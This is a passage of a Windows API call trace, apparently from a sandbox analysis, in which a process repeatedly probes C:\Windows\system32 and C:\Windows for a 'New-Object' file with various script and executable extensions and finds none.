lpOldMode=0x653ef8e020) returned 1 [0224.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.306] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.306] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.CMD" (normalized: "c:\\windows\\system32\\new-object.cmd"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.307] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.307] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.VBS" (normalized: "c:\\windows\\system32\\new-object.vbs"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.308] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.VBE" (normalized: "c:\\windows\\system32\\new-object.vbe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.308] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.309] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.JS" (normalized: "c:\\windows\\system32\\new-object.js"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.309] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.JSE" (normalized: "c:\\windows\\system32\\new-object.jse"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.WSF" (normalized: "c:\\windows\\system32\\new-object.wsf"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.WSH" (normalized: "c:\\windows\\system32\\new-object.wsh"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.MSC" (normalized: "c:\\windows\\system32\\new-object.msc"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.CPL" (normalized: "c:\\windows\\system32\\new-object.cpl"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.313] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object" (normalized: "c:\\windows\\system32\\new-object"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.314] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.314] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.ps1" (normalized: "c:\\windows\\new-object.ps1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.314] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.314] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.315] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.psm1" (normalized: "c:\\windows\\new-object.psm1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.315] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x447d2b36, ftLastAccessTime.dwHighDateTime=0x1da42d5, ftLastWriteTime.dwLowDateTime=0x447d2b36, ftLastWriteTime.dwHighDateTime=0x1da42d5, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0224.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.315] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.315] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.psd1" (normalized: "c:\\windows\\new-object.psd1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.316] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0224.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.316] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, 